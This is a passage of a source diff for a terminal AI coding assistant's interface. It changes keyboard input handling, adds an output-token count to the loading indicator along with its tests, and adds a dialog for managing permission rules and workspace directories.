setCommandSearchActive, commandSearchCompletion.resetCompletionState, ); - return; + return true; } if (shellModeActive) { setShellModeActive(false); resetEscapeState(); - return; + return true; } if (completion.showSuggestions) { completion.resetCompletionState(); setExpandedSuggestionIndex(-1); resetEscapeState(); - return; + return true; } // Handle double ESC for clearing input if (escPressCount === 0) { if (buffer.text === '') { - return; + return true; } setEscPressCount(1); setShowEscapePrompt(true); @@ -579,7 +599,7 @@ export const InputPrompt: React.FC = ({ resetCompletionState(); resetEscapeState(); } - return; + return true; } // Ctrl+Y: Retry the last failed request. @@ -589,19 +609,19 @@ export const InputPrompt: React.FC = ({ // If no failed request exists, a message will be shown to the user. if (keyMatchers[Command.RETRY_LAST](key)) { uiActions.handleRetryLastPrompt(); - return; + return true; } if (shellModeActive && keyMatchers[Command.REVERSE_SEARCH](key)) { setReverseSearchActive(true); setTextBeforeReverseSearch(buffer.text); setCursorPosition(buffer.cursor); - return; + return true; } if (keyMatchers[Command.CLEAR_SCREEN](key)) { onClearScreen(); - return; + return true; } if (reverseSearchActive || commandSearchActive) { @@ -626,29 +646,29 @@ export const InputPrompt: React.FC = ({ if (showSuggestions) { if (keyMatchers[Command.NAVIGATION_UP](key)) { navigateUp(); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { navigateDown(); - return; + return true; } if (keyMatchers[Command.COLLAPSE_SUGGESTION](key)) { if (suggestions[activeSuggestionIndex].value.length >= MAX_WIDTH) { setExpandedSuggestionIndex(-1); - return; + return true; } } if (keyMatchers[Command.EXPAND_SUGGESTION](key)) { if (suggestions[activeSuggestionIndex].value.length >= MAX_WIDTH) { setExpandedSuggestionIndex(activeSuggestionIndex); - return; + return true; } } if (keyMatchers[Command.ACCEPT_SUGGESTION_REVERSE_SEARCH](key)) { sc.handleAutocomplete(activeSuggestionIndex); resetState(); setActive(false); - return; + return true; } } @@ -660,7 +680,7 @@ export const InputPrompt: React.FC = ({ handleSubmitAndClear(textToSubmit); resetState(); setActive(false); - return; + return true; } // Prevent up/down from falling through to regular history navigation @@ -668,14 +688,14 @@ export const InputPrompt: React.FC = ({ keyMatchers[Command.NAVIGATION_UP](key) || keyMatchers[Command.NAVIGATION_DOWN](key) ) { - return; + return true; } } // If the command is a perfect match, pressing enter should execute it. if (completion.isPerfectMatch && keyMatchers[Command.RETURN](key)) { handleSubmitAndClear(buffer.text); - return; + return true; } if (completion.showSuggestions) { @@ -683,12 +703,12 @@ export const InputPrompt: React.FC = ({ if (keyMatchers[Command.COMPLETION_UP](key)) { completion.navigateUp(); setExpandedSuggestionIndex(-1); // Reset expansion when navigating - return; + return true; } if (keyMatchers[Command.COMPLETION_DOWN](key)) { completion.navigateDown(); setExpandedSuggestionIndex(-1); // Reset expansion when navigating - return; + return true; } } @@ -703,7 +723,7 @@ export const InputPrompt: React.FC = ({ setExpandedSuggestionIndex(-1); // Reset expansion after selection } } - return; + return true; } } @@ -711,28 +731,28 @@ export const InputPrompt: React.FC = ({ if (isAttachmentMode && attachments.length > 0) { if (key.name === 'left') { setSelectedAttachmentIndex((i) => Math.max(0, i - 1)); - return; + return true; } if (key.name === 'right') { setSelectedAttachmentIndex((i) => Math.min(attachments.length - 1, i + 1), ); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { // Exit attachment mode and return to input setIsAttachmentMode(false); setSelectedAttachmentIndex(-1); - return; + return true; } if (key.name === 'backspace' || key.name === 'delete') { handleAttachmentDelete(selectedAttachmentIndex); - return; + return true; } if (key.name === 'return' || key.name === 'escape') { setIsAttachmentMode(false); setSelectedAttachmentIndex(-1); - return; + return true; } // For other keys, exit attachment mode and let input handle them setIsAttachmentMode(false); @@ -753,7 +773,7 @@ export const InputPrompt: React.FC = ({ ) { setIsAttachmentMode(true); setSelectedAttachmentIndex(attachments.length - 1); - return; + return true; } if (!shellModeActive) { @@ -761,16 +781,16 @@ export const InputPrompt: React.FC = ({ setCommandSearchActive(true); setTextBeforeReverseSearch(buffer.text); setCursorPosition(buffer.cursor); - return; + return true; } if (keyMatchers[Command.HISTORY_UP](key)) { inputHistory.navigateUp(); - return; + return true; } if (keyMatchers[Command.HISTORY_DOWN](key)) { inputHistory.navigateDown(); - return; + return true; } // Handle arrow-up/down for history on single-line or at edges if ( @@ -779,27 +799,33 @@ export const InputPrompt: React.FC = ({ (buffer.visualCursor[0] === 0 && buffer.visualScrollRow === 0)) ) { inputHistory.navigateUp(); - return; + return true; } if ( keyMatchers[Command.NAVIGATION_DOWN](key) && (buffer.allVisualLines.length === 1 || buffer.visualCursor[0] === buffer.allVisualLines.length - 1) ) { - inputHistory.navigateDown(); - return; + if (inputHistory.navigateDown()) { + return true; + } + if (hasAgents) { + setAgentTabBarFocused(true); + return true; + } + return true; } } else { // Shell History Navigation if (keyMatchers[Command.NAVIGATION_UP](key)) { const prevCommand = shellHistory.getPreviousCommand(); if (prevCommand !== null) buffer.setText(prevCommand); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { const nextCommand = shellHistory.getNextCommand(); if (nextCommand !== null) buffer.setText(nextCommand); - return; + return true; } } @@ -810,7 +836,7 @@ export const InputPrompt: React.FC = ({ // paste markers may not work reliably and Enter key events can leak from pasted text. if (pasteWorkaround && recentPasteTime !== null) { // Paste occurred recently, ignore this submit to prevent auto-execution - return; + return true; } const [row, col] = buffer.cursor; @@ -823,65 +849,21 @@ export const InputPrompt: React.FC = ({ handleSubmitAndClear(buffer.text); } } - return; - } - - // Newline insertion - if (keyMatchers[Command.NEWLINE](key)) { - buffer.newline(); - return; - } - - // Ctrl+A (Home) / Ctrl+E (End) - if (keyMatchers[Command.HOME](key)) { - buffer.move('home'); - return; - } - if (keyMatchers[Command.END](key)) { - buffer.move('end'); - return; - } - // Ctrl+C (Clear input) - if (keyMatchers[Command.CLEAR_INPUT](key)) { - if (buffer.text.length > 0) { - buffer.setText(''); - resetCompletionState(); - } - return; - } - - // Kill line commands - if (keyMatchers[Command.KILL_LINE_RIGHT](key)) { - buffer.killLineRight(); - return; - } - if (keyMatchers[Command.KILL_LINE_LEFT](key)) { - buffer.killLineLeft(); - return; - } - - if (keyMatchers[Command.DELETE_WORD_BACKWARD](key)) { - buffer.deleteWordLeft(); - return; - } - - // External editor - if (keyMatchers[Command.OPEN_EXTERNAL_EDITOR](key)) { - buffer.openInExternalEditor(); - return; + return true; } // Ctrl+V for clipboard image paste if (keyMatchers[Command.PASTE_CLIPBOARD_IMAGE](key)) { handleClipboardImage(); - return; + return true; } // Handle backspace with placeholder-aware deletion if ( - key.name === 'backspace' || - key.sequence === '\x7f' || - (key.ctrl && key.name === 'h') + pendingPastes.size > 0 && + (key.name === 'backspace' || + key.sequence === '\x7f' || + (key.ctrl && key.name === 'h')) ) { const text = buffer.text; const [row, col] = buffer.cursor; @@ -894,7 +876,6 @@ export const InputPrompt: React.FC = ({ offset += col; // Check if we're at the end of any placeholder - let placeholderDeleted = false; for (const placeholder of pendingPastes.keys()) { const placeholderStart = offset - placeholder.length; if ( @@ -913,20 +894,22 @@ export const InputPrompt: React.FC = ({ if (parsed) { freePlaceholderId(parsed.charCount, parsed.id); } - placeholderDeleted = true; - break; + return true; } } - - if (!placeholderDeleted) { - // Normal backspace behavior - buffer.backspace(); - } - return; + // No placeholder matched — fall through to BaseTextInput's default backspace } - // Fall back to the text buffer's default input handling for all other keys - buffer.handleInput(key); + // Ctrl+C with completion active — also reset completion state + if (keyMatchers[Command.CLEAR_INPUT](key)) { + if (buffer.text.length > 0) { + resetCompletionState(); + } + // Fall through to BaseTextInput's default CLEAR_INPUT handler + } + + // All remaining keys (readline shortcuts, text input) handled by BaseTextInput + return false; }, [ focus, @@ -964,15 +947,89 @@ export const InputPrompt: React.FC = ({ pendingPastes, parsePlaceholder, freePlaceholderId, + agentTabBarFocused, + hasAgents, + setAgentTabBarFocused, ], ); - useKeypress(handleInput, { isActive: !isEmbeddedShellFocused }); + const renderLineWithHighlighting = useCallback( + (opts: RenderLineOptions): React.ReactNode => { + const { + lineText, + isOnCursorLine, + cursorCol: cursorVisualColAbsolute, + showCursor: showCursorOpt, + absoluteVisualIndex, + buffer: buf, + } = opts; + const mapEntry = buf.visualToLogicalMap[absoluteVisualIndex]; + const [logicalLineIdx, logicalStartCol] = mapEntry; + const logicalLine = buf.lines[logicalLineIdx] || ''; + const tokens = parseInputForHighlighting(logicalLine, logicalLineIdx); - const linesToRender = buffer.viewportVisualLines; - const [cursorVisualRowAbsolute, cursorVisualColAbsolute] = - buffer.visualCursor; - const scrollVisualRow = buffer.visualScrollRow; + const visualStart = logicalStartCol; + const visualEnd = logicalStartCol + cpLen(lineText); + const segments = buildSegmentsForVisualSlice( + tokens, + visualStart, + visualEnd, + ); + + const renderedLine: React.ReactNode[] = []; + let charCount = 0; + segments.forEach((seg, segIdx) => { + const segLen = cpLen(seg.text); + let display = seg.text; + + if (isOnCursorLine) { + const segStart = charCount; + const segEnd = segStart + segLen; + if ( + cursorVisualColAbsolute >= segStart && + cursorVisualColAbsolute < segEnd + ) { + const charToHighlight = cpSlice( + seg.text, + cursorVisualColAbsolute - segStart, + cursorVisualColAbsolute - segStart + 1, + ); + const highlighted = showCursorOpt + ? chalk.inverse(charToHighlight) + : charToHighlight; + display = + cpSlice(seg.text, 0, cursorVisualColAbsolute - segStart) + + highlighted + + cpSlice(seg.text, cursorVisualColAbsolute - segStart + 1); + } + charCount = segEnd; + } + + const color = + seg.type === 'command' || seg.type === 'file' + ? theme.text.accent + : theme.text.primary; + + renderedLine.push( + + {display} + , + ); + }); + + if (isOnCursorLine && cursorVisualColAbsolute === cpLen(lineText)) { + // Add zero-width space after cursor to prevent Ink from trimming trailing whitespace + renderedLine.push( + + {showCursorOpt ? chalk.inverse(' ') + '\u200B' : ' \u200B'} + , + ); + } + + return {renderedLine}; + }, + [], + ); const getActiveCompletion = () => { if (commandSearchActive) return commandSearchCompletion; @@ -1009,10 +1066,33 @@ export const InputPrompt: React.FC = ({ } const borderColor = - isShellFocused && !isEmbeddedShellFocused + isShellFocused && !isEmbeddedShellFocused && !agentTabBarFocused ? (statusColor ?? theme.border.focused) : theme.border.default; + const prefixNode = ( + + {shellModeActive ? ( + reverseSearchActive ? ( + + (r:){' '} + + ) : ( + '!' + ) + ) : commandSearchActive ? ( + (r:) + ) : showYoloStyling ? ( + '*' + ) : ( + '>' + )}{' '} + + ); + return ( <> {attachments.length > 0 && ( @@ -1032,142 +1112,17 @@ export const InputPrompt: React.FC = ({ ))} )} - - - {shellModeActive ? ( - reverseSearchActive ? ( - - (r:){' '} - - ) : ( - '!' - ) - ) : commandSearchActive ? ( - (r:) - ) : showYoloStyling ? ( - '*' - ) : ( - '>' - )}{' '} - - - {buffer.text.length === 0 && placeholder ? ( - showCursor ? ( - - {chalk.inverse(placeholder.slice(0, 1))} - {placeholder.slice(1)} - - ) : ( - {placeholder} - ) - ) : ( - linesToRender.map((lineText, visualIdxInRenderedSet) => { - const absoluteVisualIdx = - scrollVisualRow + visualIdxInRenderedSet; - const mapEntry = buffer.visualToLogicalMap[absoluteVisualIdx]; - const cursorVisualRow = cursorVisualRowAbsolute - scrollVisualRow; - const isOnCursorLine = - focus && visualIdxInRenderedSet === cursorVisualRow; - - const renderedLine: React.ReactNode[] = []; - - const [logicalLineIdx, logicalStartCol] = mapEntry; - const logicalLine = buffer.lines[logicalLineIdx] || ''; - const tokens = parseInputForHighlighting( - logicalLine, - logicalLineIdx, - ); - - const visualStart = logicalStartCol; - const visualEnd = logicalStartCol + cpLen(lineText); - const segments = buildSegmentsForVisualSlice( - tokens, - visualStart, - visualEnd, - ); - - let charCount = 0; - segments.forEach((seg, segIdx) => { - const segLen = cpLen(seg.text); - let display = seg.text; - - if (isOnCursorLine) { - const relativeVisualColForHighlight = cursorVisualColAbsolute; - const segStart = charCount; - const segEnd = segStart + segLen; - if ( - relativeVisualColForHighlight >= segStart && - relativeVisualColForHighlight < segEnd - ) { - const charToHighlight = cpSlice( - seg.text, - relativeVisualColForHighlight - segStart, - relativeVisualColForHighlight - segStart + 1, - ); - const highlighted = showCursor - ? chalk.inverse(charToHighlight) - : charToHighlight; - display = - cpSlice( - seg.text, - 0, - relativeVisualColForHighlight - segStart, - ) + - highlighted + - cpSlice( - seg.text, - relativeVisualColForHighlight - segStart + 1, - ); - } - charCount = segEnd; - } - - const color = - seg.type === 'command' || seg.type === 'file' - ? theme.text.accent - : theme.text.primary; - - renderedLine.push( - - {display} - , - ); - }); - - if ( - isOnCursorLine && - cursorVisualColAbsolute === cpLen(lineText) - ) { - // Add zero-width space after cursor to prevent Ink from trimming trailing whitespace - renderedLine.push( - - {showCursor ? chalk.inverse(' ') + '\u200B' : ' \u200B'} - , - ); - } - - return ( - - {renderedLine} - - ); - }) - )} - - + isActive={!isEmbeddedShellFocused} + renderLine={renderLineWithHighlighting} + /> {shouldShowSuggestions && ( ', () => { const output = lastFrame(); expect(output).toContain('MockRespondingSpinner'); expect(output).toContain('Loading...'); - expect(output).toContain('(esc to cancel, 5s)'); + expect(output).toContain('5s'); + expect(output).toContain('esc to cancel'); }); it('should render spinner (static), phrase but no time/cancel when streamingState is WaitingForConfirmation', () => { @@ -88,7 +89,7 @@ describe('', () => { expect(output).toContain('⠏'); // Static char for WaitingForConfirmation expect(output).toContain('Confirm action'); expect(output).not.toContain('(esc to cancel)'); - expect(output).not.toContain(', 10s'); + expect(output).not.toContain('10s'); }); it('should display the currentLoadingPhrase correctly', () => { @@ -112,7 +113,7 @@ describe('', () => { , StreamingState.Responding, ); - expect(lastFrame()).toContain('(esc to cancel, 1m)'); + expect(lastFrame()).toContain('(1m · esc to cancel)'); }); it('should display the elapsedTime correctly in human-readable format', () => { @@ -124,7 +125,7 @@ describe('', () => { , StreamingState.Responding, ); - expect(lastFrame()).toContain('(esc to cancel, 2m 5s)'); + expect(lastFrame()).toContain('(2m 5s · esc to cancel)'); }); it('should render rightContent when provided', () => { @@ -155,7 +156,7 @@ describe('', () => { let output = lastFrame(); expect(output).toContain('MockRespondingSpinner'); expect(output).toContain('Now Responding'); - expect(output).toContain('(esc to cancel, 2s)'); + expect(output).toContain('(2s · esc to cancel)'); // Transition to WaitingForConfirmation rerender( @@ -170,7 +171,7 @@ describe('', () => { expect(output).toContain('⠏'); expect(output).toContain('Please Confirm'); expect(output).not.toContain('(esc to cancel)'); - expect(output).not.toContain(', 15s'); + expect(output).not.toContain('15s'); // Transition back to Idle rerender( @@ -262,7 +263,7 @@ describe('', () => { // Check for single line output expect(output?.includes('\n')).toBe(false); expect(output).toContain('Loading...'); - expect(output).toContain('(esc to cancel, 5s)'); + expect(output).toContain('(5s · esc to cancel)'); expect(output).toContain('Right'); }); @@ -284,8 +285,8 @@ describe('', () => { expect(lines).toHaveLength(3); if (lines) { expect(lines[0]).toContain('Loading...'); - expect(lines[0]).not.toContain('(esc to cancel, 5s)'); - expect(lines[1]).toContain('(esc to cancel, 5s)'); + expect(lines[0]).not.toContain('5s'); + expect(lines[1]).toContain('5s'); expect(lines[2]).toContain('Right'); } }); @@ -308,4 +309,70 @@ describe('', () => { expect(lastFrame()?.includes('\n')).toBe(true); }); }); + + describe('token display', () => { + it('should display output tokens inline with arrow notation', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + expect(output).toContain('↓ 847 tokens'); + expect(output).not.toContain('↑'); + expect(output).toContain('5s'); + expect(output).toContain('esc to cancel'); + }); + + it('should not display tokens when output tokens is 0', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + }); + + it('should not display tokens when props are undefined', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + }); + + it('should hide tokens in narrow terminal', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 79, + ); + const output = lastFrame(); + expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + expect(output).toContain('esc to cancel'); + }); + + it('should show tokens in wide terminal with inline format', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 80, + ); + const output = lastFrame(); + expect(output).toContain('↓ 5.4k tokens'); + }); + + it('should format tokens inline with time and cancel', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 120, + ); + const output = lastFrame(); + expect(output).toContain('(5s · ↓ 5.4k tokens · esc to cancel)'); + }); + }); }); diff --git a/packages/cli/src/ui/components/LoadingIndicator.tsx b/packages/cli/src/ui/components/LoadingIndicator.tsx index 5fc2c20b4..7b6f2f06f 100644 --- a/packages/cli/src/ui/components/LoadingIndicator.tsx +++ b/packages/cli/src/ui/components/LoadingIndicator.tsx @@ -11,7 +11,7 @@ import { theme } from '../semantic-colors.js'; import { useStreamingContext } from '../contexts/StreamingContext.js'; import { StreamingState } from '../types.js'; import { GeminiRespondingSpinner } from './GeminiRespondingSpinner.js'; -import { formatDuration } from '../utils/formatters.js'; +import { formatDuration, formatTokenCount } from '../utils/formatters.js'; import { useTerminalSize } from '../hooks/useTerminalSize.js'; import { isNarrowWidth } from '../utils/isNarrowWidth.js'; import { t } from '../../i18n/index.js'; @@ -21,6 +21,7 @@ interface LoadingIndicatorProps { elapsedTime: number; rightContent?: React.ReactNode; thought?: ThoughtSummary | null; + candidatesTokens?: number; } export const LoadingIndicator: React.FC = ({ @@ -28,6 +29,7 @@ export const LoadingIndicator: React.FC = ({ elapsedTime, rightContent, thought, + candidatesTokens, }) => { const streamingState = useStreamingContext(); const { columns: terminalWidth } = useTerminalSize(); @@ -39,18 +41,26 @@ export const LoadingIndicator: React.FC = ({ const primaryText = thought?.subject || currentLoadingPhrase; + const outputTokens = candidatesTokens ?? 0; + const showTokens = !isNarrow && outputTokens > 0; + + const timeStr = + elapsedTime < 60 ? `${elapsedTime}s` : formatDuration(elapsedTime * 1000); + + const tokenStr = showTokens + ? ` · ↓ ${formatTokenCount(outputTokens)} tokens` + : ''; + const cancelAndTimerContent = streamingState !== StreamingState.WaitingForConfirmation - ? t('(esc to cancel, {{time}})', { - time: - elapsedTime < 60 - ? `${elapsedTime}s` - : formatDuration(elapsedTime * 1000), + ? t('({{time}}{{tokens}} · esc to cancel)', { + time: timeStr, + tokens: tokenStr, }) : null; return ( - + {/* Main loading line */} void; +} + +// --------------------------------------------------------------------------- +// Main component +// --------------------------------------------------------------------------- + +export function PermissionsDialog({ + onExit, +}: PermissionsDialogProps): React.JSX.Element { + const config = useConfig(); + const settings = useSettings(); + const pm = config.getPermissionManager?.() as PermissionManager | null; + + // --- Tab state --- + const tabs = useMemo(() => getTabs(), []); + const [activeTabIndex, setActiveTabIndex] = useState(0); + const activeTab = tabs[activeTabIndex]!; + + // --- Rule list state --- + const [allRules, setAllRules] = useState([]); + const [searchQuery, setSearchQuery] = useState(''); + const [isSearchActive, setIsSearchActive] = useState(false); + + // --- Dialog view state machine --- + const [view, setView] = useState('rule-list'); + const [newRuleInput, setNewRuleInput] = useState(''); + const [pendingRuleText, setPendingRuleText] = useState(''); + const [deleteTarget, setDeleteTarget] = useState(null); + + // --- Workspace directory state --- + const workspaceContext = config.getWorkspaceContext(); + const [newDirInput, setNewDirInput] = useState(''); + const [dirInputError, setDirInputError] = useState(''); + const [dirInputRemountKey, setDirInputRemountKey] = useState(0); + const [completionIndex, setCompletionIndex] = useState(0); + const [removeDirTarget, setRemoveDirTarget] = useState(null); + const [dirRefreshKey, setDirRefreshKey] = useState(0); + + // Refresh rules from PermissionManager + const refreshRules = useCallback(() => { + if (pm) { + setAllRules(pm.listRules()); + } + }, [pm]); + + useEffect(() => { + refreshRules(); + }, [refreshRules]); + + // --- Workspace directory helpers --- + const directories = useMemo(() => { + // eslint-disable-next-line @typescript-eslint/no-unused-expressions + dirRefreshKey; // dependency to trigger re-computation + return workspaceContext.getDirectories(); + }, [workspaceContext, dirRefreshKey]); + + const initialDirs = useMemo( + () => new Set(workspaceContext.getInitialDirectories()), + [workspaceContext], + ); + + // Filesystem completions based on current input + const dirCompletions = useMemo(() => { + const trimmed = newDirInput.trim(); + if (!trimmed) return []; + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const endsWithSep = + expanded.endsWith('/') || expanded.endsWith(nodePath.sep); + const searchDir = endsWithSep ? expanded : nodePath.dirname(expanded); + const prefix = endsWithSep ? '' : nodePath.basename(expanded); + try { + return fs + .readdirSync(searchDir, { withFileTypes: true }) + .filter( + (e) => + e.isDirectory() && + e.name.startsWith(prefix) && + !e.name.startsWith('.'), + ) + .map((e) => nodePath.join(searchDir, e.name)) + .slice(0, 6); + } catch { + return []; + } + }, [newDirInput]); + + const handleDirInputChange = useCallback( + (text: string) => { + setNewDirInput(text); + if (dirInputError) setDirInputError(''); + }, + [dirInputError], + ); + + // Reset selection to first item whenever the completions list changes + useEffect(() => { + setCompletionIndex(0); + }, [dirCompletions]); + + const handleDirTabComplete = useCallback(() => { + const selected = dirCompletions[completionIndex] ?? dirCompletions[0]; + if (selected) { + setNewDirInput(selected + '/'); + setDirInputRemountKey((k) => k + 1); + } + }, [dirCompletions, completionIndex]); + + const handleDirCompletionUp = useCallback(() => { + if (dirCompletions.length === 0) return; + setCompletionIndex( + (prev) => (prev - 1 + dirCompletions.length) % dirCompletions.length, + ); + }, [dirCompletions.length]); + + const handleDirCompletionDown = useCallback(() => { + if (dirCompletions.length === 0) return; + setCompletionIndex((prev) => (prev + 1) % dirCompletions.length); + }, [dirCompletions.length]); + + const dirListItems = useMemo(() => { + const items: Array<{ + label: string; + value: string; + key: string; + }> = []; + // 'Add directory…' always FIRST + items.push({ + label: t('Add directory…'), + value: '__add_dir__', + key: '__add_dir__', + }); + // Only show non-initial (runtime-added) directories in the selectable list + for (const dir of directories) { + if (!initialDirs.has(dir)) { + items.push({ + label: dir, + value: dir, + key: `dir-${dir}`, + }); + } + } + return items; + }, [directories, initialDirs]); + + const handleDirListSelect = useCallback( + (value: string) => { + if (value === '__add_dir__') { + setNewDirInput(''); + setView('ws-add-dir-input'); + return; + } + // Selecting a directory → offer to remove if not initial + if (!initialDirs.has(value)) { + setRemoveDirTarget(value); + setView('ws-remove-confirm'); + } + }, + [initialDirs], + ); + + const handleAddDirSubmit = useCallback(() => { + const trimmed = newDirInput.trim(); + if (!trimmed) return; + + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const absoluteExpanded = nodePath.isAbsolute(expanded) + ? expanded + : nodePath.resolve(expanded); + + // Existence & type checks + if (!fs.existsSync(absoluteExpanded)) { + setDirInputError(t('Directory does not exist.')); + return; + } + if (!fs.statSync(absoluteExpanded).isDirectory()) { + setDirInputError(t('Path is not a directory.')); + return; + } + + // Resolve real path to match what workspaceContext stores + let resolved: string; + try { + resolved = fs.realpathSync(absoluteExpanded); + } catch { + resolved = absoluteExpanded; + } + + // Validate: exact duplicate + if ((directories as string[]).includes(resolved)) { + setDirInputError(t('This directory is already in the workspace.')); + return; + } + + // Validate: is a subdirectory of an existing workspace directory + for (const existingDir of directories) { + if (isPathWithinRoot(resolved, existingDir)) { + setDirInputError( + t('Already covered by existing directory: {{dir}}', { + dir: existingDir, + }), + ); + return; + } + } + + setDirInputError(''); + + // Add to workspace context (already validated) + workspaceContext.addDirectory(resolved); + + // Persist directly to project (Workspace) settings + const key = 'context.includeDirectories'; + const currentDirs = (settings.merged as Record)[ + 'context' + ] as Record | undefined; + const existingDirs = currentDirs?.['includeDirectories'] ?? []; + if (!existingDirs.includes(resolved)) { + settings.setValue(SettingScope.Workspace, key, [ + ...existingDirs, + resolved, + ]); + } + + setDirRefreshKey((k) => k + 1); + setView('ws-dir-list'); + setNewDirInput(''); + }, [newDirInput, directories, workspaceContext, settings]); + + const handleRemoveDirConfirm = useCallback(() => { + if (!removeDirTarget) return; + + // Remove from workspace context + workspaceContext.removeDirectory(removeDirTarget); + + // Remove from settings (try both scopes) + for (const scope of [SettingScope.User, SettingScope.Workspace]) { + const scopeSettings = settings.forScope(scope).settings; + const contextSection = (scopeSettings as Record)[ + 'context' + ] as Record | undefined; + const scopeDirs = contextSection?.['includeDirectories']; + if (scopeDirs?.includes(removeDirTarget)) { + const updated = scopeDirs.filter((d: string) => d !== removeDirTarget); + settings.setValue(scope, 'context.includeDirectories', updated); + break; + } + } + + setDirRefreshKey((k) => k + 1); + setRemoveDirTarget(null); + setView('ws-dir-list'); + }, [removeDirTarget, workspaceContext, settings]); + + // Filter rules for current tab + const currentTabRules = useMemo(() => { + if (activeTab.id === 'workspace') return []; + return allRules.filter((r) => r.type === activeTab.id); + }, [allRules, activeTab.id]); + + // Search-filtered rules + const filteredRules = useMemo(() => { + if (!searchQuery.trim()) return currentTabRules; + const q = searchQuery.toLowerCase(); + return currentTabRules.filter( + (r) => + r.rule.raw.toLowerCase().includes(q) || + r.rule.toolName.toLowerCase().includes(q), + ); + }, [currentTabRules, searchQuery]); + + // Build radio items: "Add a new rule..." + filtered rules + const listItems = useMemo(() => { + const items: Array<{ + label: string; + value: string; + key: string; + }> = [ + { + label: t('Add a new rule…'), + value: '__add__', + key: '__add__', + }, + ]; + for (const r of filteredRules) { + items.push({ + label: `${r.rule.raw}`, + value: r.rule.raw, + key: `${r.type}-${r.scope}-${r.rule.raw}`, + }); + } + return items; + }, [filteredRules]); + + // --- Action handlers --- + + const handleTabCycle = useCallback( + (direction: 1 | -1) => { + const newIndex = (activeTabIndex + direction + tabs.length) % tabs.length; + setActiveTabIndex(newIndex); + setSearchQuery(''); + setIsSearchActive(false); + setDirInputError(''); + // Set the appropriate default view for each tab + const newTab = tabs[newIndex]!; + setView(newTab.id === 'workspace' ? 'ws-dir-list' : 'rule-list'); + }, + [activeTabIndex, tabs], + ); + + const handleListSelect = useCallback( + (value: string) => { + if (value === '__add__') { + setNewRuleInput(''); + setView('add-rule-input'); + return; + } + // Selecting an existing rule → offer to delete + const found = filteredRules.find((r) => r.rule.raw === value); + if (found) { + setDeleteTarget(found); + setView('delete-confirm'); + } + }, + [filteredRules], + ); + + const handleAddRuleSubmit = useCallback(() => { + const trimmed = newRuleInput.trim(); + if (!trimmed) return; + setPendingRuleText(trimmed); + setView('add-rule-scope'); + }, [newRuleInput]); + + const handleScopeSelect = useCallback( + (scope: SettingScope) => { + if (!pm || activeTab.id === 'workspace') return; + const ruleType = activeTab.id as RuleType; + + // Add to PermissionManager in-memory + pm.addPersistentRule(pendingRuleText, ruleType); + + // Persist to settings file (with dedup) + const key = `permissions.${ruleType}`; + const perms = (settings.merged as Record)[ + 'permissions' + ] as Record | undefined; + const currentRules = perms?.[ruleType] ?? []; + if (!currentRules.includes(pendingRuleText)) { + settings.setValue(scope, key, [...currentRules, pendingRuleText]); + } + + // Refresh and go back + refreshRules(); + setView('rule-list'); + setPendingRuleText(''); + }, + [pm, activeTab.id, pendingRuleText, settings, refreshRules], + ); + + const handleDeleteConfirm = useCallback(() => { + if (!pm || !deleteTarget) return; + const ruleType = deleteTarget.type; + + // Remove from PermissionManager in-memory + pm.removePersistentRule(deleteTarget.rule.raw, ruleType); + + // Persist removal — find and remove from settings + // We try both User and Workspace scopes + for (const scope of [SettingScope.User, SettingScope.Workspace]) { + const scopeSettings = settings.forScope(scope).settings; + const perms = (scopeSettings as Record)[ + 'permissions' + ] as Record | undefined; + const scopeRules = perms?.[ruleType]; + if (scopeRules?.includes(deleteTarget.rule.raw)) { + const updated = scopeRules.filter( + (r: string) => r !== deleteTarget.rule.raw, + ); + settings.setValue(scope, `permissions.${ruleType}`, updated); + break; + } + } + + refreshRules(); + setDeleteTarget(null); + setView('rule-list'); + }, [pm, deleteTarget, settings, refreshRules]); + + // --- Keypress handling --- + + useKeypress( + (key) => { + if (view === 'rule-list') { + if (key.name === 'escape') { + if (isSearchActive && searchQuery) { + setSearchQuery(''); + setIsSearchActive(false); + } else { + onExit(); + } + return; + } + if (key.name === 'tab') { + handleTabCycle(1); + return; + } + if (key.name === 'right' || key.name === 'left') { + handleTabCycle(key.name === 'right' ? 1 : -1); + return; + } + // Search input: backspace + if (key.name === 'backspace' || key.name === 'delete') { + if (searchQuery.length > 0) { + setSearchQuery((prev) => prev.slice(0, -1)); + } + return; + } + // Search input: printable characters + if ( + key.sequence && + !key.ctrl && + !key.meta && + key.sequence.length === 1 && + key.sequence >= ' ' + ) { + setSearchQuery((prev) => prev + key.sequence); + setIsSearchActive(true); + return; + } + } + if (view === 'add-rule-input') { + if (key.name === 'escape') { + setView('rule-list'); + return; + } + } + if (view === 'add-rule-scope') { + if (key.name === 'escape') { + setView('add-rule-input'); + return; + } + } + if (view === 'delete-confirm') { + if (key.name === 'escape') { + setDeleteTarget(null); + setView('rule-list'); + return; + } + if (key.name === 'return') { + handleDeleteConfirm(); + return; + } + } + // Workspace tab views + if (view === 'ws-dir-list') { + if (key.name === 'escape') { + onExit(); + return; + } + if (key.name === 'tab') { + handleTabCycle(1); + return; + } + if (key.name === 'right' || key.name === 'left') { + handleTabCycle(key.name === 'right' ? 1 : -1); + return; + } + } + if (view === 'ws-add-dir-input') { + if (key.name === 'escape') { + setDirInputError(''); + setView('ws-dir-list'); + return; + } + } + if (view === 'ws-remove-confirm') { + if (key.name === 'escape') { + setRemoveDirTarget(null); + setView('ws-dir-list'); + return; + } + if (key.name === 'return') { + handleRemoveDirConfirm(); + return; + } + } + }, + { isActive: true }, + ); + + // --- Workspace tab: add directory input --- + if (activeTab.id === 'workspace' && view === 'ws-add-dir-input') { + return ( + + + {t('Add directory to workspace')} + + + + {t( + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.', + )} + + + {t('Enter the path to the 